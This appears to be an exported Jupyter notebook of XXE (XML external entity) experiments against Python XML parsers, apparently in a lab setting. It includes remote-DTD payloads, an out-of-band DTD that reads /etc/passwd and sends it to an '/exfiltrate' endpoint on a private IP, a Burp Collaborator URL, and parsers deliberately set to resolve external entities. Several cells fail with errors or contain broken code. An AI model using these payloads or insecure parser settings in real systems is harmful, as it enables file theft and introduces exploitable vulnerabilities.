In [105]:
from lxml import etree
import requests
# class CustomResolver(etree.Resolver):
#     def resolve(self, url, pubid, context):
#         # Fetch the content from the provided URL
#         response = requests.get(url)
#         if response.status_code == 200:
#             content = response.text
#             # Return the fetched content
#             return self.resolve_string(content, context)
#         else:
#             # Handle errors or return an empty string if needed
#             return self.resolve_string("", context)

In [108]:
def parse_svg_file():
    parser = etree.XMLParser(load_dtd=True, no_network=False, resolve_entities=True)
    with open('evil.svg', 'rb') as svg_file:
        tree = etree.parse(svg_file, parser)
        root = tree.getroot()
        print(etree.dump(root))

In [109]:
parse_svg_file()

XMLSyntaxError: Detected an entity reference loop, line 2, column 91 (xxe.dtd, line 2)

In [36]:
import urllib.parse
from lxml import etree

url = "http://im81nr4zhac2lafxnm997qwk6bc20r.burpcollaborator.net/?x=&#x25;file;"
url_encoded = url.replace("%file", urllib.parse.quote("%file"))

# Now you can use the url_encoded variable in your lxml code
print(url_encoded)

http://im81nr4zhac2lafxnm997qwk6bc20r.burpcollaborator.net/?x=&#x25;file;


In [78]:
import sys
from xml.sax import make_parser
from xml.sax.handler import ContentHandler

class VulnerableContentHandler(ContentHandler):
    def startElement(self, name, attrs):
        print("startElement:", name)

    def endElement(self, name):
        print("endElement:", name)

    def characters(self, content):
        print("characters:", content)

def vulnerable_parse_xml_file(xml_file):
    parser = make_parser()
    parser.setFeature("http://xml.org/sax/features/external-general-entities", True)
    parser.setContentHandler(VulnerableContentHandler())
    parser.parse(xml_file)

vulnerable_parse_xml_file("evil.svg")

SAXParseException: http://192.168.30.102:9090/xxe.dtd:2:16: error in processing external entity reference

In [116]:
import io
from xml.sax import make_parser
from xml.dom import minidom
from xml.sax.xmlreader import InputSource

def parse_svg_file():
    class CustomEntityResolver:
        def resolveEntity(self, publicId, systemId):
            return systemId  # Resolve external entities by returning their system ID.

    with open('evil.svg', 'rb') as svg_file:
        parser = make_parser()
        parser.setEntityResolver(CustomEntityResolver())

        input_source = InputSource()
        input_source.setByteStream(svg_file)
        dom = minidom.parse(input_source, parser=parser)

        root = dom.documentElement
        print(root.toprettyxml())


In [117]:
parse_svg_file()

AttributeError: 'InputSource' object has no attribute 'read'

In [120]:
import urllib.request
import xml.etree.ElementTree as ET

# Define the URL of the DTD file
dtd_url = "http://192.168.30.102:9090/xxe.dtd"

# Define a custom resolver function for loading the DTD file through network access
def resolve_dtd(url):
    dtd_data = urllib.request.urlopen(url).read()
    return ET.XML(dtd_data)

# Define the XML file to parse
xml_file = "sample.xml"

# Parse the XML file using the custom resolver function
parser = ET.DefusedXML.TreeBuilder(target=ET.TreeBuilder())
parser.parser.EntityResolver = resolve_dtd
tree = ET.parse(xml_file, parser)

# Access the root element of the XML document
root = tree.getroot()

# Do something with the parsed data...

AttributeError: module 'xml.etree.ElementTree' has no attribute 'DefusedXML'

In [169]:
import xml.etree.ElementTree as ET
import urllib.request

# Define a custom resolver function to load DTD from network
def dtd_resolver(url):
    with urllib.request.urlopen(url) as response:
        print(urllib.request.urlopen(url))
        return response.read()

# Define a custom parser class to handle external entity references
class CustomXMLParser(ET.XMLParser):
    def resolve_external_entity(self, public_id, system_id):
        if system_id.startswith("http"):
            # Load DTD from network using the custom resolver
            dtd_content = dtd_resolver(system_id)
            return ET.XML(dtd_content)
        else:
            # Use default behavior for local DTD files
            return super().resolve_external_entity(public_id, system_id)

# Parse XML with external entity references and network-loaded DTD
xml_content = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://192.168.30.102:9090/xxe.dtd">
  %remote;
]>
<foo>&xxe;</foo>
'''
parser = CustomXMLParser()
root = ET.fromstring(xml_content, parser=parser)

# Print the parsed XML tree
ET.dump(root)

ParseError: undefined entity &xxe;: line 6, column 5 (<string>)

In [139]:
class CustomEntityResolver(xml.sax.handler.ContentHandler):
    def resolveEntity(self, publicId, systemId):
        print(systemid)
        if systemId.startswith("http://"):
            response = requests.get(systemId)
            if response.status_code == 200:
                dtd_data = response.text
                input_source = xml.sax.InputSource()
                input_source.setSystemId(systemId)
                input_source.setCharacterStream(io.StringIO(dtd_data))
                return input_source
        return None

In [140]:
class CustomContentHandler(xml.sax.ContentHandler):
    def startElement(self, name, attrs):
        print(f"Start element: {name}")

    def endElement(self, name):
        print(f"End element: {name}")

    def characters(self, content):
        print(f"Content: {content.strip()}")


In [144]:
xml_data = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://192.168.30.102:9090/xxne.dtd">
  %remote;
]>
<foo>&data;</foo>
'''
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
parser.setEntityResolver(resolver)
parser.setContentHandler(handler)
xml.sax.parseString(xml_data, handler)

Start element: foo
End element: foo


In [168]:
import xml.sax
import xml.sax.handler
import xml.sax.saxutils as saxutils
import requests
import io
import urllib.parse as urlparse
import urllib.request as urllib2

def make_caching_prepare_input_source(old_prepare_input_source):
    def caching_prepare_input_source(source, base=None):
        if isinstance(source, xml.sax.xmlreader.InputSource):
            return source

        full_uri = urlparse.urljoin(base or "", source)

        if not full_uri.startswith('http:'):
            args = (source,) if base is None else (source, base)
            return old_prepare_input_source(*args)

        response = requests.get(full_uri)
        if response.status_code == 200:
            dtd_data = response.text
            i = xml.sax.xmlreader.InputSource()
            i.setSystemId(source)
            i.setCharacterStream(io.StringIO(dtd_data))
            return i

    return caching_prepare_input_source

saxutils.prepare_input_source = make_caching_prepare_input_source(saxutils.prepare_input_source)

class CustomContentHandler(xml.sax.handler.ContentHandler):
    def startElement(self, name, attrs):
        print(f"Start element: {name}")

    def endElement(self, name):
        print(f"End element: {name}")

    def characters(self, content):
        print(f"Content: {content.strip()}")

xml_data = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://192.168.30.102:9090/xxe.dtd">
  %remote;
]>
<foo>&data;</foo>
'''

handler = CustomContentHandler()

# Create the parser and enable processing of external general entities
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)

parser.setContentHandler(handler)
xml.sax.parseString(xml_data, handler)


Start element: foo
End element: foo


In [212]:

# working
from defusedxml.lxml import fromstring
import requests

class CustomResolver(etree.Resolver):
    def resolve(self, url, id, context):
        print(url, id, context)
        if url.startswith("http://"):
            print(url)
            # response = requests.get(url)
            # if response.status_code == 200:
            #     dtd_data = response.text
            #     return self.resolve_string(dtd_data, context)
            
        elif url.startswith("file://"):
            print(url)
            # Read the local file content
        #     file_path = url[7:]
        #     with open(file_path, "r") as file:
        #         content = file.read()
        #     return self.resolve_string(content, context)
        # return None
        
        else:
            print("done")

xml_data = '''<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://192.168.30.102:9090/xxe.dtd">
%dtd;
%file;
]>
<foo>
</foo>
'''

# Encode the XML data as a byte string
xml_data_bytes = xml_data.encode('utf-8')

parser = etree.XMLParser(load_dtd=True, no_network=False, resolve_entities=True)
parser.resolvers.add(CustomResolver())
root = fromstring(xml_data_bytes, parser=parser, forbid_dtd=False, forbid_entities=False)   

# You can now process the XML tree with root as the root element


http://192.168.30.102:9090/xxe.dtd None <lxml.etree._ParserContext object at 0x7f90020a01c0>
http://192.168.30.102:9090/xxe.dtd
file:///etc/hostname None <lxml.etree._ParserContext object at 0x7f90020a01c0>
file:///etc/hostname


XMLSyntaxError: internal error: xmlParseInternalSubset: error detected in Markup declaration
, line 1, column 1 (hostname, line 1)

In [176]:
import xml.sax
import xml.sax.handler
from lxml import etree

class CustomEntityResolver(xml.sax.handler.EntityResolver):
    def resolveEntity(self, publicId, systemId):
        if systemId.endswith('sample.dtd'):
            dtd_data = '''<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY xxe SYSTEM 'http://192.168.30.102:9091/exfiltrate?data=%file;'>">
%eval;'''
            return xml.sax.InputSource(None, dtd_data)
        return None

class CustomContentHandler(xml.sax.handler.ContentHandler):
    def startElement(self, name, attrs):
        print("StartElement:", name)

    def endElement(self, name):
        print("EndElement:", name)

xml_data = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://192.168.30.102:9090/xxe.dtd">
  %remote;
]>
<foo>&data;</foo>
'''

    parser = xml.sax.make_parser()
    parser.setEntityResolver(CustomEntityResolver())
    parser.setContentHandler(CustomContentHandler())


xml.sax.parseString(xml_data, handler)


Start element: foo
End element: foo


In [170]:
from lxml import etree

def parse_vulnerable(xml_string):
    parser = etree.XMLParser(resolve_entities=True)
    tree = etree.fromstring(xml_string.encode('utf-8'), parser)
    return tree

xml_string = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://192.168.30.102:9090/xxe.dtd">
  %remote;
]>
<foo>&xxe;</foo>
'''

try:
    tree = parse_vulnerable(xml_string)
    print(etree.tostring(tree, pretty_print=True).decode())
except etree.XMLSyntaxError as e:
    print(f"Error: {e}")


Error: Entity 'xxe' not defined, line 6, column 11 (<string>, line 6)


In [192]:
import requests
import urllib.parse

# CDATA to be sent as payload
cdata = "<![CDATA[This is some <b>bold</b> text.]]>"

# Encode the CDATA
encoded_cdata = urllib.parse.quote(cdata, safe='')

# URL endpoint to send the encoded CDATA to
url = "https://192.168.30.102:9091/"

# Request headers
headers = {
    "Content-Type": "application/xml"
}

# Request body containing the encoded CDATA
body = f"""
<root>
  <message>
    {encoded_cdata}
  </message>
</root>
"""

# Send the request to the URL endpoint
response = requests.post(url, headers=headers, data=body)

# Handle the response
# ...


SSLError: HTTPSConnectionPool(host='192.168.30.102', port=9091): Max retries exceeded with url: / (Caused by SSLError(SSLEOFError(8, 'EOF occurred in violation of protocol (_ssl.c:1129)')))

In [213]:
from bs4 import BeautifulSoup
with open("evil.svg") as file:
    soup = BeautifulSoup(file, features="lxml-xml")

In [214]:
soup.find_all()

[<foo/>]